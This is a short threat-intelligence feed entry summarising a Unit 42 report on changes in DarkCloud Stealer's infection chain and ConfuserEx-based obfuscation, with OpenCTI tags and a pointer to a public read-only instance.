New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer

SUMMARY :

Unit 42 researchers have observed changes in the distribution and obfuscation techniques of DarkCloud Stealer. The new infection chain, first seen in April 2025, involves ConfuserEx obfuscation and a final payload written in Visual Basic 6. The attack begins with a phishing email containing an archive file, which leads to the download and execution of a PowerShell script. This script then drops an executable protected by ConfuserEx, which ultimately injects the DarkCloud Stealer payload into a legitimate process. The malware employs various anti-analysis techniques, including encryption and obfuscation of strings. These changes highlight the evolving evasion strategies of cybercriminals and underscore the need for advanced, behavior-based threat detection approaches.

OPENCTI LABELS :

process hollowing,infostealer,obfuscation,anti-analysis,infection chain,confuserex,darkcloud stealer,visual basic 6


Open in NetmanageIT OpenCTI Public Instance with below link!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer